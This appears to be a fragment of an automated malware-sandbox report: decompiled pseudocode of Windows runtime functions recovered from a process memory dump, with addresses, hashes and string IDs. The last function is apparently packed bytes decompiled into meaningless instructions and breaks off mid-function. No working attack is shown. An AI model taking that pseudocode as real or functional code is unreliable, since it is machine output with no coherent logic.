                                                                      							_t64 = E00A2E18B(_t109 + 4, _t97, 4, _t88, 0);
                                                                      							if(_t64 == 0x102) {
                                                                      								break;
                                                                      							}
                                                                      							_t93 =  *(_t109 + 4);
                                                                      							_v8 = _t93;
                                                                      							if((_t93 & 0x00000002) != 0) {
                                                                      								continue;
                                                                      							}
                                                                      							L15:
                                                                      							if(_t64 == 0x102) {
                                                                      								break;
                                                                      							}
                                                                      							_t89 = _v24;
                                                                      							if(_t64 < 0) {
                                                                      								L00A4DF30(_t93, _t97, _t64);
                                                                      								_push(_t93);
                                                                      								_t98 = _t97 | 0xffffffff;
                                                                      								__eflags =  *0xae6901;
                                                                      								_push(_t109);
                                                                      								_v52 = _t98;
                                                                      								if( *0xae6901 != 0) {
                                                                      									_push(0);
                                                                      									_push(1);
                                                                      									_push(0);
                                                                      									_push(0x100003);
                                                                      									_push( &_v12);
                                                                      									_t72 = E00A39980();
                                                                      									__eflags = _t72;
                                                                      									if(_t72 < 0) {
                                                                      										_v12 = _t98 | 0xffffffff;
                                                                      									}
                                                                      								}
                                                                      								asm("lock cmpxchg [ecx], edx");
                                                                      								_t111 = 0;
                                                                      								__eflags = 0;
                                                                      								if(0 != 0) {
                                                                      									__eflags = _v12 - 0xffffffff;
                                                                      									if(_v12 != 0xffffffff) {
                                                                      										_push(_v12);
                                                                      										E00A395D0();
                                                                      									}
                                                                      								} else {
                                                                      									_t111 = _v12;
                                                                      								}
                                                                      								return _t111;
                                                                      							} else {
                                                                      								if(_t89 != 0) {
                                                                      									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
                                                                      									_t77 = E00A17D50();
                                                                      									__eflags = _t77;
                                                                      									if(_t77 == 0) {
                                                                      										_t64 = 0x7ffe0384;
                                                                      									} else {
                                                                      										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
                                                                      									}
                                                                      									__eflags =  *_t64;
                                                                      									if( *_t64 != 0) {
                                                                      										_t64 =  *[fs:0x30];
                                                                      										__eflags = _t64[0x240] & 0x00000004;
                                                                      										if((_t64[0x240] & 0x00000004) != 0) {
                                                                      											_t78 = E00A17D50();
                                                                      											__eflags = _t78;
                                                                      											if(_t78 == 0) {
                                                                      												_t64 = 0x7ffe0385;
                                                                      											} else {
                                                                      												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
                                                                      											}
                                                                      											__eflags =  *_t64 & 0x00000020;
                                                                      											if(( *_t64 & 0x00000020) != 0) {
                                                                      												_t64 = E00A77016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
                                                                      											}
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      								return _t64;
                                                                      							}
                                                                      						}
                                                                      						_t97 = _t88;
                                                                      						_t93 = _t109;
                                                                      						E00A8FDDA(_t97, _v12);
                                                                      						_t105 =  *_t109;
                                                                      						_t67 = _v12 + 1;
                                                                      						_v12 = _t67;
                                                                      						__eflags = _t105 - 0xffffffff;
                                                                      						if(_t105 == 0xffffffff) {
                                                                      							_t106 = 0;
                                                                      							__eflags = 0;
                                                                      						} else {
                                                                      							_t106 =  *(_t105 + 0x14);
                                                                      						}
                                                                      						__eflags = _t67 - 2;
                                                                      						if(_t67 > 2) {
                                                                      							__eflags = _t109 - 0xae5350;
                                                                      							if(_t109 != 0xae5350) {
                                                                      								__eflags = _t106 - _v20;
                                                                      								if(__eflags == 0) {
                                                                      									_t93 = _t109;
                                                                      									E00A8FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						_push("RTL: Re-Waiting\n");
                                                                      						_push(0);
                                                                      						_push(0x65);
                                                                      						_v20 = _t106;
                                                                      						E00A85720();
                                                                      						_t104 = _v28;
                                                                      						_t116 = _t116 + 0xc;
                                                                      						continue;
                                                                      					}
                                                                      				}
                                                                      			}

                                                                      0x00000000
                                                                      0x009f2e5a
                                                                      0x009f2e5f
                                                                      0x009f2e9a
                                                                      0x009f2ea4
                                                                      0x009f2ea5
                                                                      0x009f2ea8
                                                                      0x009f2eaf
                                                                      0x009f2eb2
                                                                      0x009f2eb5
                                                                      0x00a4fae9
                                                                      0x00a4faeb
                                                                      0x00a4faed
                                                                      0x00a4faef
                                                                      0x00a4faf7
                                                                      0x00a4faf8
                                                                      0x00a4fafd
                                                                      0x00a4faff
                                                                      0x00a4fb04
                                                                      0x00a4fb04
                                                                      0x00a4faff
                                                                      0x009f2ec0
                                                                      0x009f2ec4
                                                                      0x009f2ec6
                                                                      0x009f2ec8
                                                                      0x00a4fb14
                                                                      0x00a4fb18
                                                                      0x00a4fb1e
                                                                      0x00a4fb21
                                                                      0x00a4fb21
                                                                      0x009f2ece
                                                                      0x009f2ece
                                                                      0x009f2ece
                                                                      0x009f2ed7
                                                                      0x009f2e61
                                                                      0x009f2e63
                                                                      0x00a4fa6b
                                                                      0x00a4fa71
                                                                      0x00a4fa76
                                                                      0x00a4fa78
                                                                      0x00a4fa8a
                                                                      0x00a4fa7a
                                                                      0x00a4fa83
                                                                      0x00a4fa83
                                                                      0x00a4fa8f
                                                                      0x00a4fa91
                                                                      0x00a4fa97
                                                                      0x00a4fa9d
                                                                      0x00a4faa4
                                                                      0x00a4faaa
                                                                      0x00a4faaf
                                                                      0x00a4fab1
                                                                      0x00a4fac3
                                                                      0x00a4fab3
                                                                      0x00a4fabc
                                                                      0x00a4fabc
                                                                      0x00a4fac8
                                                                      0x00a4facb
                                                                      0x00a4fadf
                                                                      0x00a4fadf
                                                                      0x00a4facb
                                                                      0x00a4faa4
                                                                      0x00a4fa91
                                                                      0x009f2e6f
                                                                      0x009f2e6f
                                                                      0x009f2e5f
                                                                      0x00a4fa13
                                                                      0x00a4fa15
                                                                      0x00a4fa17
                                                                      0x00a4fa1f
                                                                      0x00a4fa21
                                                                      0x00a4fa22
                                                                      0x00a4fa25
                                                                      0x00a4fa28
                                                                      0x00a4fa2f
                                                                      0x00a4fa2f
                                                                      0x00a4fa2a
                                                                      0x00a4fa2a
                                                                      0x00a4fa2a
                                                                      0x00a4fa31
                                                                      0x00a4fa34
                                                                      0x00a4fa36
                                                                      0x00a4fa3c
                                                                      0x00a4fa3e
                                                                      0x00a4fa41
                                                                      0x00a4fa43
                                                                      0x00a4fa45
                                                                      0x00a4fa45
                                                                      0x00a4fa41
                                                                      0x00a4fa3c
                                                                      0x00a4fa4a
                                                                      0x00a4fa4f
                                                                      0x00a4fa51
                                                                      0x00a4fa53
                                                                      0x00a4fa56
                                                                      0x00a4fa5b
                                                                      0x00a4fa5e
                                                                      0x00000000
                                                                      0x00a4fa5e
                                                                      0x009f2e23

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: RTL: Re-Waiting
                                                                      • API String ID: 0-316354757
                                                                      • Opcode ID: 1acafabf442012525da52ad4367e38dc597eb2488d84a600095b88458d50f965
                                                                      • Instruction ID: 03f6f4e0d277634e537534d56df1b1d66a7d58d32b6cac029fe5db22eb1df088
                                                                      • Opcode Fuzzy Hash: 1acafabf442012525da52ad4367e38dc597eb2488d84a600095b88458d50f965
                                                                      • Instruction Fuzzy Hash: 24615431A00648AFDB31DF68C984B7EB7B4EF84354F24067AEA159B2C2C7349D41C781
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 78%
                                                                      			E009F52A5(char __ecx) {
                                                                      				char _v20;
                                                                      				char _v28;
                                                                      				char _v29;
                                                                      				void* _v32;
                                                                      				void* _v36;
                                                                      				void* _v37;
                                                                      				void* _v38;
                                                                      				void* _v40;
                                                                      				void* _v46;
                                                                      				void* _v64;
                                                                      				void* __ebx;
                                                                      				intOrPtr* _t49;
                                                                      				signed int _t53;
                                                                      				short _t85;
                                                                      				signed int _t87;
                                                                      				signed int _t88;
                                                                      				signed int _t89;
                                                                      				intOrPtr _t101;
                                                                      				intOrPtr* _t102;
                                                                      				intOrPtr* _t104;
                                                                      				signed int _t106;
                                                                      				void* _t108;
                                                                      
                                                                      				_t93 = __ecx;
                                                                      				_t108 = (_t106 & 0xfffffff8) - 0x1c;
                                                                      				_push(_t88);
                                                                      				_v29 = __ecx;
                                                                      				_t89 = _t88 | 0xffffffff;
                                                                      				while(1) {
                                                                      					E00A0EEF0(0xae79a0);
                                                                      					_t104 =  *0xae8210; // 0x4c2c78
                                                                      					if(_t104 == 0) {
                                                                      						break;
                                                                      					}
                                                                      					asm("lock inc dword [esi]");
                                                                      					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
                                                                      					E00A0EB70(_t93, 0xae79a0);
                                                                      					if( *((char*)(_t108 + 0xf)) != 0) {
                                                                      						_t101 =  *0x7ffe02dc;
                                                                      						__eflags =  *(_t104 + 0x14) & 0x00000001;
                                                                      						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
                                                                      							L9:
                                                                      							_push(0);
                                                                      							_push(0);
                                                                      							_push(0);
                                                                      							_push(0);
                                                                      							_push(0x90028);
                                                                      							_push(_t108 + 0x20);
                                                                      							_push(0);
                                                                      							_push(0);
                                                                      							_push(0);
                                                                      							_push( *((intOrPtr*)(_t104 + 4)));
                                                                      							_t53 = E00A39890();
                                                                      							__eflags = _t53;
                                                                      							if(_t53 >= 0) {
                                                                      								__eflags =  *(_t104 + 0x14) & 0x00000001;
                                                                      								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
                                                                      									E00A0EEF0(0xae79a0);
                                                                      									 *((intOrPtr*)(_t104 + 8)) = _t101;
                                                                      									E00A0EB70(0, 0xae79a0);
                                                                      								}
                                                                      								goto L3;
                                                                      							}
                                                                      							__eflags = _t53 - 0xc0000012;
                                                                      							if(__eflags == 0) {
                                                                      								L12:
                                                                      								_t13 = _t104 + 0xc; // 0x4c2c85
                                                                      								_t93 = _t13;
                                                                      								 *((char*)(_t108 + 0x12)) = 0;
                                                                      								__eflags = E00A2F0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
                                                                      								if(__eflags >= 0) {
                                                                      									L15:
                                                                      									_t102 = _v28;
                                                                      									 *_t102 = 2;
                                                                      									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                                                                      									E00A0EEF0(0xae79a0);
                                                                      									__eflags =  *0xae8210 - _t104; // 0x4c2c78
                                                                      									if(__eflags == 0) {
                                                                      										__eflags =  *((char*)(_t108 + 0xe));
                                                                      										_t95 =  *((intOrPtr*)(_t108 + 0x14));
                                                                      										 *0xae8210 = _t102;
                                                                      										_t32 = _t102 + 0xc; // 0x0
                                                                      										 *_t95 =  *_t32;
                                                                      										_t33 = _t102 + 0x10; // 0x0
                                                                      										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
                                                                      										_t35 = _t102 + 4; // 0xffffffff
                                                                      										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
                                                                      										if(__eflags != 0) {
                                                                      											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
                                                                      											E00A74888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
                                                                      										}
                                                                      										E00A0EB70(_t95, 0xae79a0);
                                                                      										asm("lock xadd [esi], eax");
                                                                      										if(__eflags == 0) {
                                                                      											_push( *((intOrPtr*)(_t104 + 4)));
                                                                      											E00A395D0();
                                                                      											L00A177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                                                      											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                                                      										}
                                                                      										asm("lock xadd [esi], ebx");
                                                                      										__eflags = _t89 == 1;
                                                                      										if(_t89 == 1) {
                                                                      											_push( *((intOrPtr*)(_t104 + 4)));
                                                                      											E00A395D0();
                                                                      											L00A177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                                                      											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                                                      										}
                                                                      										_t49 = _t102;
                                                                      										L4:
                                                                      										return _t49;
                                                                      									}
                                                                      									E00A0EB70(_t93, 0xae79a0);
                                                                      									asm("lock xadd [esi], eax");
                                                                      									if(__eflags == 0) {
                                                                      										_push( *((intOrPtr*)(_t104 + 4)));
                                                                      										E00A395D0();
                                                                      										L00A177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                                                      										_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                                                      									}
                                                                      									 *_t102 = 1;
                                                                      									asm("lock xadd [edi], eax");
                                                                      									if(__eflags == 0) {
                                                                      										_t28 = _t102 + 4; // 0xffffffff
                                                                      										_push( *_t28);
                                                                      										E00A395D0();
                                                                      										L00A177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
                                                                      									}
                                                                      									continue;
                                                                      								}
                                                                      								_t93 =  &_v20;
                                                                      								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
                                                                      								_t85 = 6;
                                                                      								_v20 = _t85;
                                                                      								_t87 = E00A2F0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
                                                                      								__eflags = _t87;
                                                                      								if(_t87 < 0) {
                                                                      									goto L3;
                                                                      								}
                                                                      								 *((char*)(_t108 + 0xe)) = 1;
                                                                      								goto L15;
                                                                      							}
                                                                      							__eflags = _t53 - 0xc000026e;
                                                                      							if(__eflags != 0) {
                                                                      								goto L3;
                                                                      							}
                                                                      							goto L12;
                                                                      						}
                                                                      						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
                                                                      						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
                                                                      							goto L3;
                                                                      						} else {
                                                                      							goto L9;
                                                                      						}
                                                                      					}
                                                                      					L3:
                                                                      					_t49 = _t104;
                                                                      					goto L4;
                                                                      				}
                                                                      				_t49 = 0;
                                                                      				goto L4;
                                                                      			}

























                                                                      0x00a50f3c
                                                                      0x00a50f3f
                                                                      0x00a50f50
                                                                      0x00a50f55
                                                                      0x00a50f55
                                                                      0x00a50f59
                                                                      0x009f52eb
                                                                      0x009f52f1
                                                                      0x009f52f1
                                                                      0x00a50e7d
                                                                      0x00a50e84
                                                                      0x00a50e88
                                                                      0x00a50e8a
                                                                      0x00a50e8d
                                                                      0x00a50e9e
                                                                      0x00a50ea3
                                                                      0x00a50ea3
                                                                      0x00a50ea7
                                                                      0x00a50eaf
                                                                      0x00a50eb3
                                                                      0x00a50eb9
                                                                      0x00a50eb9
                                                                      0x00a50ebc
                                                                      0x00a50ecd
                                                                      0x00a50ecd
                                                                      0x00000000
                                                                      0x00a50eb3
                                                                      0x00a50e21
                                                                      0x00a50e2b
                                                                      0x00a50e2f
                                                                      0x00a50e30
                                                                      0x00a50e3a
                                                                      0x00a50e3f
                                                                      0x00a50e41
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a50e47
                                                                      0x00000000
                                                                      0x00a50e47
                                                                      0x00a50df9
                                                                      0x00a50dfe
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a50dfe
                                                                      0x009f5303
                                                                      0x009f5307
                                                                      0x00000000
                                                                      0x009f5309
                                                                      0x00000000
                                                                      0x009f5309
                                                                      0x009f5307
                                                                      0x009f52e9
                                                                      0x009f52e9
                                                                      0x00000000
                                                                      0x009f52e9
                                                                      0x009f530e
                                                                      0x00000000

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: x,L
                                                                      • API String ID: 0-3824715503
                                                                      • Opcode ID: 200c6cc5f326c503629c722495d28b0f79ac41caf52572a7766eef24b48e353b
                                                                      • Instruction ID: cf5a337ff296f1e422231094c566a19517bbb481aa88285056c0a7544544ca88
                                                                      • Opcode Fuzzy Hash: 200c6cc5f326c503629c722495d28b0f79ac41caf52572a7766eef24b48e353b
                                                                      • Instruction Fuzzy Hash: 4451DF31205745ABC321DF68CA42B6BB7E4FF54710F104D1DF9A587692E774E848C792
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 80%
                                                                      			E00AC0EA5(void* __ecx, void* __edx) {
                                                                      				signed int _v20;
                                                                      				char _v24;
                                                                      				intOrPtr _v28;
                                                                      				unsigned int _v32;
                                                                      				signed int _v36;
                                                                      				intOrPtr _v40;
                                                                      				char _v44;
                                                                      				intOrPtr _v64;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				signed int _t58;
                                                                      				unsigned int _t60;
                                                                      				intOrPtr _t62;
                                                                      				char* _t67;
                                                                      				char* _t69;
                                                                      				void* _t80;
                                                                      				void* _t83;
                                                                      				intOrPtr _t93;
                                                                      				intOrPtr _t115;
                                                                      				char _t117;
                                                                      				void* _t120;
                                                                      
                                                                      				_t83 = __edx;
                                                                      				_t117 = 0;
                                                                      				_t120 = __ecx;
                                                                      				_v44 = 0;
                                                                      				if(E00ABFF69(__ecx,  &_v44,  &_v32) < 0) {
                                                                      					L24:
                                                                      					_t109 = _v44;
                                                                      					if(_v44 != 0) {
                                                                      						E00AC1074(_t83, _t120, _t109, _t117, _t117);
                                                                      					}
                                                                      					L26:
                                                                      					return _t117;
                                                                      				}
                                                                      				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
                                                                      				_t5 = _t83 + 1; // 0x1
                                                                      				_v36 = _t5 << 0xc;
                                                                      				_v40 = _t93;
                                                                      				_t58 =  *(_t93 + 0xc) & 0x40000000;
                                                                      				asm("sbb ebx, ebx");
                                                                      				_t83 = ( ~_t58 & 0x0000003c) + 4;
                                                                      				if(_t58 != 0) {
                                                                      					_push(0);
                                                                      					_push(0x14);
                                                                      					_push( &_v24);
                                                                      					_push(3);
                                                                      					_push(_t93);
                                                                      					_push(0xffffffff);
                                                                      					_t80 = E00A39730();
                                                                      					_t115 = _v64;
                                                                      					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
                                                                      						_push(_t93);
                                                                      						E00ABA80D(_t115, 1, _v20, _t117);
                                                                      						_t83 = 4;
                                                                      					}
                                                                      				}
                                                                      				if(E00ABA854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
                                                                      					goto L24;
                                                                      				}
                                                                      				_t60 = _v32;
                                                                      				_t97 = (_t60 != 0x100000) + 1;
                                                                      				_t83 = (_v44 -  *0xae8b04 >> 0x14) + (_v44 -  *0xae8b04 >> 0x14);
                                                                      				_v28 = (_t60 != 0x100000) + 1;
                                                                      				_t62 = _t83 + (_t60 >> 0x14) * 2;
                                                                      				_v40 = _t62;
                                                                      				if(_t83 >= _t62) {
                                                                      					L10:
                                                                      					asm("lock xadd [eax], ecx");
                                                                      					asm("lock xadd [eax], ecx");
                                                                      					if(E00A17D50() == 0) {
                                                                      						_t67 = 0x7ffe0380;
                                                                      					} else {
                                                                      						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                      					}
                                                                      					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                                      						E00AB138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
                                                                      					}
                                                                      					if(E00A17D50() == 0) {
                                                                      						_t69 = 0x7ffe0388;
                                                                      					} else {
                                                                      						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                      					}
                                                                      					if( *_t69 != 0) {
                                                                      						E00AAFEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
                                                                      					}
                                                                      					if(( *0xae8724 & 0x00000008) != 0) {
                                                                      						E00AB52F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
                                                                      					}
                                                                      					_t117 = _v44;
                                                                      					goto L26;
                                                                      				}
                                                                      				while(E00AC15B5(0xae8ae4, _t83, _t97, _t97) >= 0) {
                                                                      					_t97 = _v28;
                                                                      					_t83 = _t83 + 2;
                                                                      					if(_t83 < _v40) {
                                                                      						continue;
                                                                      					}
                                                                      					goto L10;
                                                                      				}
                                                                      				goto L24;
                                                                      			}

























                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: `
                                                                      • API String ID: 0-2679148245
                                                                      • Opcode ID: 494b872b9f8b2602d216d8c93a1b1af2a1af1696c1701b5f67beb84f707e4277
                                                                      • Instruction ID: f2232e8a4af2cb4e605f0bd2f776040e49d0f6f24b87c965489b05a78bec9829
                                                                      • Opcode Fuzzy Hash: 494b872b9f8b2602d216d8c93a1b1af2a1af1696c1701b5f67beb84f707e4277
                                                                      • Instruction Fuzzy Hash: 2651AE703083819FD725DF28D981F2BB7E9EBC5304F05092CF99697292D670E885CB62
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 75%
                                                                      			E00A2F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
                                                                      				intOrPtr _v8;
                                                                      				intOrPtr _v12;
                                                                      				intOrPtr _v16;
                                                                      				char* _v20;
                                                                      				intOrPtr _v24;
                                                                      				char _v28;
                                                                      				intOrPtr _v32;
                                                                      				char _v36;
                                                                      				char _v44;
                                                                      				char _v52;
                                                                      				intOrPtr _v56;
                                                                      				char _v60;
                                                                      				intOrPtr _v72;
                                                                      				void* _t51;
                                                                      				void* _t58;
                                                                      				signed short _t82;
                                                                      				short _t84;
                                                                      				signed int _t91;
                                                                      				signed int _t100;
                                                                      				signed short* _t103;
                                                                      				void* _t108;
                                                                      				intOrPtr* _t109;
                                                                      
                                                                      				_t103 = __ecx;
                                                                      				_t82 = __edx;
                                                                      				_t51 = E00A14120(0, __ecx, 0,  &_v52, 0, 0, 0);
                                                                      				if(_t51 >= 0) {
                                                                      					_push(0x21);
                                                                      					_push(3);
                                                                      					_v56 =  *0x7ffe02dc;
                                                                      					_v20 =  &_v52;
                                                                      					_push( &_v44);
                                                                      					_v28 = 0x18;
                                                                      					_push( &_v28);
                                                                      					_push(0x100020);
                                                                      					_v24 = 0;
                                                                      					_push( &_v60);
                                                                      					_v16 = 0x40;
                                                                      					_v12 = 0;
                                                                      					_v8 = 0;
                                                                      					_t58 = E00A39830();
                                                                      					_t87 =  *[fs:0x30];
                                                                      					_t108 = _t58;
                                                                      					L00A177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
                                                                      					if(_t108 < 0) {
                                                                      						L11:
                                                                      						_t51 = _t108;
                                                                      					} else {
                                                                      						_push(4);
                                                                      						_push(8);
                                                                      						_push( &_v36);
                                                                      						_push( &_v44);
                                                                      						_push(_v60);
                                                                      						_t108 = E00A39990();
                                                                      						if(_t108 < 0) {
                                                                      							L10:
                                                                      							_push(_v60);
                                                                      							E00A395D0();
                                                                      							goto L11;
                                                                      						} else {
                                                                      							_t109 = L00A14620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
                                                                      							if(_t109 == 0) {
                                                                      								_t108 = 0xc0000017;
                                                                      								goto L10;
                                                                      							} else {
                                                                      								_t21 = _t109 + 0x18; // 0x18
                                                                      								 *((intOrPtr*)(_t109 + 4)) = _v60;
                                                                      								 *_t109 = 1;
                                                                      								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
                                                                      								 *(_t109 + 0xe) = _t82;
                                                                      								 *((intOrPtr*)(_t109 + 8)) = _v56;
                                                                      								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
                                                                      								E00A3F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
                                                                      								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                      								 *((short*)(_t109 + 0xc)) =  *_t103;
                                                                      								_t91 =  *_t103 & 0x0000ffff;
                                                                      								_t100 = _t91 & 0xfffffffe;
                                                                      								_t84 = 0x5c;
                                                                      								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
                                                                      									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
                                                                      										_push(_v60);
                                                                      										E00A395D0();
                                                                      										L00A177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
                                                                      										_t51 = 0xc0000106;
                                                                      									} else {
                                                                      										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
                                                                      										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                      										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
                                                                      										goto L5;
                                                                      									}
                                                                      								} else {
                                                                      									L5:
                                                                      									 *_a4 = _t109;
                                                                      									_t51 = 0;
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				return _t51;
                                                                      			}

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @
                                                                      • API String ID: 0-2766056989
                                                                      • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                      • Instruction ID: 1cd8ab9590adf313794ae92e5ff100a3773ae2dbd916572410617cd019a450d0
                                                                      • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                      • Instruction Fuzzy Hash: 11519D71504710AFC321DF59C841A6BB7F8FF48710F108A2DF99587690E7B4E954CBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 53%
                                                                      			E0040C326(void* __eax, signed int* __ebx, signed int __ecx, void* __edx, void* __esi) {
                                                                      				signed int _t25;
                                                                      				signed int* _t29;
                                                                      				signed char _t35;
                                                                      				signed int _t37;
                                                                      				signed char _t38;
                                                                      				intOrPtr* _t39;
                                                                      				signed int _t46;
                                                                      				signed int _t49;
                                                                      				signed int _t54;
                                                                      				signed char _t57;
                                                                      
                                                                      				_t43 = __esi;
                                                                      				_t34 = __ecx;
                                                                      				_t29 = __ebx;
                                                                      				_t25 = __eax + 0x13;
                                                                      				_push(es);
                                                                      				asm("sbb eax, 0xf7950914");
                                                                      				_t37 = __edx - 1;
                                                                      				_t39 = 0x1686e0f8;
                                                                      				if(_t37 < 0) {
                                                                      					L6:
                                                                      					_t38 = 0xf6;
                                                                      					if(_t54 < 0) {
                                                                      						asm("adc al, 0x1e");
                                                                      						 *_t25 =  *_t25 & 0x000000f6;
                                                                      						asm("adc bl, cl");
                                                                      						asm("das");
                                                                      						_t38 = 0x2b83eba8;
                                                                      						L8:
                                                                      						_t39 = _t39 -  *_t39 +  *((intOrPtr*)(_t39 -  *_t39));
                                                                      						L9:
                                                                      						asm("iretd");
                                                                      						_pop(_t29);
                                                                      					}
                                                                      					L11:
                                                                      					asm("jecxz 0xb");
                                                                      					asm("cld");
                                                                      					_t38 = _t38 | _t29[0x1cc96b6c];
                                                                      					asm("fsubr dword [esi-0x7a15ce99]");
                                                                      					asm("loop 0xffffffdb");
                                                                      					_t34 = _t34 &  *(_t49 + _t46 + 0xd28a7d5);
                                                                      					asm("loop 0x74");
                                                                      					asm("popfd");
                                                                      					_t25 =  *_t29 * 0xe38756e0 ^ 0xe6cd3779;
                                                                      					_t20 = _t25 - 0x70;
                                                                      					 *_t20 =  *(_t25 - 0x70) << 1;
                                                                      					_t57 =  *_t20;
                                                                      					asm("outsb");
                                                                      					_push(_t43);
                                                                      					if(_t57 >= 0) {
                                                                      						goto L4;
                                                                      					} else {
                                                                      						if(_t57 != 0) {
                                                                      							goto L8;
                                                                      						} else {
                                                                      							_t38 = _t38 ^  *(_t39 - 0x152f07d2);
                                                                      							asm("lock pushad");
                                                                      							 *[cs:edx-0x7a] =  *[cs:edx-0x7a] >> 1;
                                                                      							asm("invalid");
                                                                      							asm("loop 0x41");
                                                                      							asm("adc eax, 0xf24b586e");
                                                                      							asm("sbb al, 0xa2");
                                                                      							_t39 =  *_t34;
                                                                      							asm("sahf");
                                                                      							goto L9;
                                                                      						}
                                                                      						goto L11;
                                                                      					}
                                                                      					L15:
                                                                      				} else {
                                                                      					_t43 = __esi;
                                                                      					asm("adc [ebp+0x12], esp");
                                                                      					asm("sti");
                                                                      					_pop(_t39);
                                                                      					_t49 = _t49 & __ebx[0x8b8794d];
                                                                      					_t35 = __ecx | _t49;
                                                                      					 *(_t43 + 0x3251a05a) =  ~( *(_t43 + 0x3251a05a));
                                                                      					_t25 = 0xd4;
                                                                      					_t4 = _t43 + 0xfffffffcd8d7fc60;
                                                                      					 *_t4 =  *(_t43 + 0xfffffffcd8d7fc60) | _t35;
                                                                      					if( *_t4 >= 0) {
                                                                      						asm("stosb");
                                                                      						_t37 = 0xd4 *  *0x00000112 >> 0x20;
                                                                      						_t25 = 0xd4 *  *0x00000112;
                                                                      						asm("lock mov ebp, 0x5a6341e8");
                                                                      					}
                                                                      					_t34 = _t35 + 1;
                                                                      					asm("arpl [edx+0x4c], bx");
                                                                      					 *(_t39 + 0xa257867) =  *(_t39 + 0xa257867) & _t37;
